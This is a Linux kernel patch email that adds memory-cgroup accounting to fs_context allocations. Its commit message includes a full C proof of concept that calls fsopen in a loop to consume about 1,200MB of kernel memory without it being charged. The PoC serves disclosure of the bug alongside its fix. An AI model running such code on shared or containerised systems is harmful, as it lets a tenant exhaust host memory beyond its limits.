| From bb902cb47cf93b33cd92b3b7a4019330a03ef57f Mon Sep 17 00:00:00 2001 |
| From: Yutian Yang <nglaive@gmail.com> |
| Date: Thu, 2 Sep 2021 14:55:07 -0700 |
| Subject: memcg: charge fs_context and legacy_fs_context |
| |
| From: Yutian Yang <nglaive@gmail.com> |
| |
| commit bb902cb47cf93b33cd92b3b7a4019330a03ef57f upstream. |
| |
| This patch adds accounting flags to fs_context and legacy_fs_context |
| allocation sites so that kernel could correctly charge these objects. |
| |
| We have written a PoC to demonstrate the effect of the missing-charging |
| bugs. The PoC takes around 1,200MB unaccounted memory, while it is |
| charged for only 362MB memory usage. We evaluate the PoC on QEMU x86_64 |
| v5.2.90 + Linux kernel v5.10.19 + Debian buster. All the limitations |
| including ulimits and sysctl variables are set as default. Specifically, |
| the hard NOFILE limit and nr_open in sysctl are both 1,048,576. |
| |
| /*------------------------- POC code ----------------------------*/ |
| |
| #define _GNU_SOURCE |
| #include <sys/types.h> |
| #include <sys/file.h> |
| #include <time.h> |
| #include <sys/wait.h> |
| #include <stdint.h> |
| #include <stdlib.h> |
| #include <unistd.h> |
| #include <stdio.h> |
| #include <signal.h> |
| #include <sched.h> |
| #include <fcntl.h> |
| #include <linux/mount.h> |
| |
| #define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \ |
| } while (0) |
| |
| #define STACK_SIZE (8 * 1024) |
| #ifndef __NR_fsopen |
| #define __NR_fsopen 430 |
| #endif |
| static inline int fsopen(const char *fs_name, unsigned int flags) |
| { |
| return syscall(__NR_fsopen, fs_name, flags); |
| } |
| |
| static char thread_stack[512][STACK_SIZE]; |
| |
| int thread_fn(void* arg) |
| { |
| for (int i = 0; i< 800000; ++i) { |
| int fsfd = fsopen("nfs", FSOPEN_CLOEXEC); |
| if (fsfd == -1) { |
| errExit("fsopen"); |
| } |
| } |
| while(1); |
| return 0; |
| } |
| |
| int main(int argc, char *argv[]) { |
| int thread_pid; |
| for (int i = 0; i < 1; ++i) { |
| thread_pid = clone(thread_fn, thread_stack[i] + STACK_SIZE, \ |
| SIGCHLD, NULL); |
| } |
| while(1); |
| return 0; |
| } |
| |
| /*-------------------------- end --------------------------------*/ |
| |
| Link: https://lkml.kernel.org/r/1626517201-24086-1-git-send-email-nglaive@gmail.com |
| Signed-off-by: Yutian Yang <nglaive@gmail.com> |
| Reviewed-by: Shakeel Butt <shakeelb@google.com> |
| Cc: Michal Hocko <mhocko@kernel.org> |
| Cc: Johannes Weiner <hannes@cmpxchg.org> |
| Cc: Vladimir Davydov <vdavydov.dev@gmail.com> |
| Cc: <shenwenbo@zju.edu.cn> |
| Signed-off-by: Andrew Morton <akpm@linux-foundation.org> |
| Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> |
| Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> |
| --- |
| fs/fs_context.c | 4 ++-- |
| 1 file changed, 2 insertions(+), 2 deletions(-) |
| |
| --- a/fs/fs_context.c |
| +++ b/fs/fs_context.c |
| @@ -231,7 +231,7 @@ static struct fs_context *alloc_fs_conte |
| struct fs_context *fc; |
| int ret = -ENOMEM; |
| |
| - fc = kzalloc(sizeof(struct fs_context), GFP_KERNEL); |
| + fc = kzalloc(sizeof(struct fs_context), GFP_KERNEL_ACCOUNT); |
| if (!fc) |
| return ERR_PTR(-ENOMEM); |
| |
| @@ -631,7 +631,7 @@ const struct fs_context_operations legac |
| */ |
| static int legacy_init_fs_context(struct fs_context *fc) |
| { |
| - fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL); |
| + fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL_ACCOUNT); |
| if (!fc->fs_private) |
| return -ENOMEM; |
| fc->ops = &legacy_fs_context_ops; |